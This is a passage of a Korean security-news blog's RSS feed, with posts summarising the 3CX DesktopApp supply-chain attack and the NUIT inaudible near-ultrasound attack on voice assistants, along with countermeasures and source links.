data-og-image=&quot;https://scrap.kakaocdn.net/dn/bjyLzs/hyScwLrqt4/TKUUK8fNJRrDfKstioRod0/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/Y7qBr/hySa4wfYXJ/Q6tdEPEAOyBtB45mOze3vK/img.png?width=784&amp;amp;height=294&amp;amp;face=0_0_784_294&quot;&gt;&lt;a href=&quot;https://asec.ahnlab.com/ko/50797/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://asec.ahnlab.com/ko/50797/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bjyLzs/hyScwLrqt4/TKUUK8fNJRrDfKstioRod0/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/Y7qBr/hySa4wfYXJ/Q6tdEPEAOyBtB45mOze3vK/img.png?width=784&amp;amp;height=294&amp;amp;face=0_0_784_294');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;3CX DesktopApp 사용 주의 (CVE-2023-29059) - ASEC BLOG&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;개요 3CX DesktopApp을 통해 공급망 공격이 이루어졌다는 내용이 공개되었다.[1] 해당 소프트웨어는 통화, 화상 회의 등 사용자에게 여러 통신 기능을 제공하며 Windows, MAC 운영체제 환경에서 구동이&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;asec.ahnlab.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안랩 블로그,&amp;nbsp;3CX DesktopApp 공급망 공격, 국내에서도 확인, &lt;a href=&quot;https://asec.ahnlab.com/ko/50965/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://asec.ahnlab.com/ko/50965/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680802299450&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;3CX DesktopApp 공급망 공격, 국내에서도 확인 - ASEC BLOG&quot; data-og-description=&quot;2023년 3월 29일 CrowdStrike는 북한 기반의 공격 그룹이 3CX DesktopApp을 통해 공급망 공격을 수행한 사실을 소개하였다. [1] 공격자는 이를 이용해 정보 탈취 악성코드를 설치하였다. AhnLab Security Emergency&quot; data-og-host=&quot;asec.ahnlab.com&quot; data-og-source-url=&quot;https://asec.ahnlab.com/ko/50965/&quot; data-og-url=&quot;http://asec.ahnlab.com/ko/50965/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/nDtz9/hySaU8fEmK/qISto6PwZjf6NkM0k2FIKK/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/bNWLpW/hyScG1AL61/6kytgu1GiQUW2zI66FoLJ0/img.png?width=780&amp;amp;height=504&amp;amp;face=0_0_780_504,https://scrap.kakaocdn.net/dn/bwLMQU/hySaWEYWV8/UDByjoHuX2j6zjVbPOQQA0/img.png?width=837&amp;amp;height=366&amp;amp;face=0_0_837_366&quot;&gt;&lt;a href=&quot;https://asec.ahnlab.com/ko/50965/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://asec.ahnlab.com/ko/50965/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/nDtz9/hySaU8fEmK/qISto6PwZjf6NkM0k2FIKK/img.png?width=1200&amp;amp;height=627&amp;amp;face=0_0_1200_627,https://scrap.kakaocdn.net/dn/bNWLpW/hyScG1AL61/6kytgu1GiQUW2zI66FoLJ0/img.png?width=780&amp;amp;height=504&amp;amp;face=0_0_780_504,https://scrap.kakaocdn.net/dn/bwLMQU/hySaWEYWV8/UDByjoHuX2j6zjVbPOQQA0/img.png?width=837&amp;amp;height=366&amp;amp;face=0_0_837_366');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;3CX DesktopApp 공급망 공격, 국내에서도 확인 - ASEC BLOG&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;2023년 3월 29일 CrowdStrike는 북한 기반의 공격 그룹이 3CX DesktopApp을 통해 공급망 공격을 수행한 사실을 소개하였다. [1] 공격자는 이를 이용해 정보 탈취 악성코드를 설치하였다. AhnLab Security Emergency&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;asec.ahnlab.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;div id=&quot;body_left&quot; style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot;&gt;
&lt;div id=&quot;media&quot;&gt;&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/612</guid>
      <comments>https://jennana.tistory.com/612#entry612comment</comments>
      <pubDate>Fri, 7 Apr 2023 03:03:44 +0900</pubDate>
    </item>
    <item>
      <title>[IT/보안뉴스] 들리지 않는 초음파 공격으로 은밀하게 악성 명령을 실행하는 AI 스피커</title>
      <link>https://jennana.tistory.com/611</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;805&quot; data-origin-height=&quot;644&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cleNxa/btr8gxC4hgS/bElOwWjOvjYTk8IWBfUg01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cleNxa/btr8gxC4hgS/bElOwWjOvjYTk8IWBfUg01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cleNxa/btr8gxC4hgS/bElOwWjOvjYTk8IWBfUg01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcleNxa%2Fbtr8gxC4hgS%2FbElOwWjOvjYTk8IWBfUg01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;805&quot; height=&quot;644&quot; data-origin-width=&quot;805&quot; data-origin-height=&quot;644&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;기사요약 :&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;미국 연구진은 스마트폰, 스마트 스피커, IoT 같은 음성 비서로 구동되는 장치에 대해서 기계는 들을 수 있지만 사람은 들을 수 없는 초음파를 이용하여&amp;nbsp; 조용하게 공격을 할 수 있는 &quot;Near-Ultrasound Inaudible Tojan(NUIT)&quot;이라는 새로운 공격을 개발했다고 한다. 해당 공격에 영향을 받는 장비로 애플의 Siri, 구글의 어시스턴트, 마이크로소프트의 Cortana, 아마존의 Alexa가 있으며, 해당 공격을 이용해서 악성 명령을 실행할 수 있다고 한다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- NUIT 공격의 주요 원리&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;인간의 귀로는 들을수 없는 근초음파(Near-Ultrasound)를 이용하여 응답이 가능하기 때문에&amp;nbsp;기존 스피커를 계속 사용하면서 노출의 위험이 최소화될 수 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- NUIT 공격 예시&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 미디어, YouTube 비디오를 재생하는 웹 사이트에서 악성 미디어를 재생하도록 하는 사회공학적 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) Zoom&amp;nbsp; 미팅 중에 공격 신호를 삽입하면 컴퓨터 옆에 있는 전화기 해킹 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 3) IoT가 연결된 스마트폰에 해당 공격을 보내면 문을 열고, 집 경보기 비활성화와 같은 공격이 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 4) 브라우저 취약성을 악용하여 '워터링 홀' 웹 사이트로 스마트폰 유도 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- NUIT 공격이 성공하기 위한 조건&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 일정 볼륨 이상으로 설정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 명령은 0.77초 동안만 지속됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- NUIT 공격에 대응하는 방법&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 1) 음성지문으로 스마트기기 인증이 가능하면 해당 방식 활성화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; 2) 스피커 대신 이어폰을 사용하여 소리를 듣거나 소리를 방송&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;권준 기자, &lt;span style=&quot;color: #282828; letter-spacing: -1px; background-color: #ffffff;&quot;&gt;초음파 공격으로 AI 스피커 등 스마트홈 시스템 해제 가능, 보안뉴스, &lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116844&amp;amp;page=1&amp;amp;kind=1&quot;&gt;https://www.boannews.com/media/view.asp?idx=116844&amp;amp;page=1&amp;amp;kind=1&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680681528720&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;초음파 공격으로 AI 스피커 등 스마트홈 시스템 해제 가능&quot; data-og-description=&quot;IT 외신 레지스터에 의하면 미국 연구진이 스마트 장치 마이크와 음성 비서의 취약점을 악용하여 스마트폰과 홈 장치에 자동으로 원격에서 액세스할 수 있는 Near-Ultrasound Inaudible Trojan용 NUIT라는 &quot; data-og-host=&quot;www.boannews.com&quot; data-og-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116844&amp;amp;page=1&amp;amp;kind=1&quot; data-og-url=&quot;http://www.boannews.com/media/view.asp?idx=116844&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/bi21CP/hySaTAbjZD/RMLQlgJ0SRxSxagcOegOC0/img.jpg?width=895&amp;amp;height=607&amp;amp;face=0_0_895_607&quot;&gt;&lt;a href=&quot;https://www.boannews.com/media/view.asp?idx=116844&amp;amp;page=1&amp;amp;kind=1&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boannews.com/media/view.asp?idx=116844&amp;amp;page=1&amp;amp;kind=1&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/bi21CP/hySaTAbjZD/RMLQlgJ0SRxSxagcOegOC0/img.jpg?width=895&amp;amp;height=607&amp;amp;face=0_0_895_607');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;초음파 공격으로 AI 스피커 등 스마트홈 시스템 해제 가능&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;IT 외신 레지스터에 의하면 미국 연구진이 스마트 장치 마이크와 음성 비서의 취약점을 악용하여 스마트폰과 홈 장치에 자동으로 원격에서 액세스할 수 있는 Near-Ultrasound Inaudible Trojan용 NUIT라는&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boannews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Bill Toulas,&amp;nbsp;Inaudible ultrasound attack can stealthily control your phone, smart speaker, BLEEPING COMPUTER, &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1680681579565&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Inaudible ultrasound attack can stealthily control your phone, smart speaker&quot; data-og-description=&quot;American university researchers have developed a novel attack which they named &amp;quot;Near-Ultrasound Inaudible Trojan&amp;quot; (NUIT) that can launch silent attacks against devices powered by voice assistants, like smartphones,&amp;nbsp;smart speakers, and other IoTs.&quot; data-og-host=&quot;www.bleepingcomputer.com&quot; data-og-source-url=&quot;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&quot; data-og-url=&quot;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/FLIJ9/hySaTAbnbM/JH0mt0vj6RpxrMzn0GRyB1/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900&quot;&gt;&lt;a href=&quot;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.bleepingcomputer.com/news/security/inaudible-ultrasound-attack-can-stealthily-control-your-phone-smart-speaker/&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/FLIJ9/hySaTAbnbM/JH0mt0vj6RpxrMzn0GRyB1/img.jpg?width=1600&amp;amp;height=900&amp;amp;face=0_0_1600_900');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Inaudible ultrasound attack can stealthily control your phone, smart speaker&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;American university researchers have developed a novel attack which they named &quot;Near-Ultrasound Inaudible Trojan&quot; (NUIT) that can launch silent attacks against devices powered by voice assistants, like smartphones,&amp;nbsp;smart speakers, and other IoTs.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.bleepingcomputer.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 뉴스  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/611</guid>
      <comments>https://jennana.tistory.com/611#entry611comment</comments>
      <pubDate>Thu, 6 Apr 2023 08:02:46 +0900</pubDate>
    </item>
  </channel>
</rss>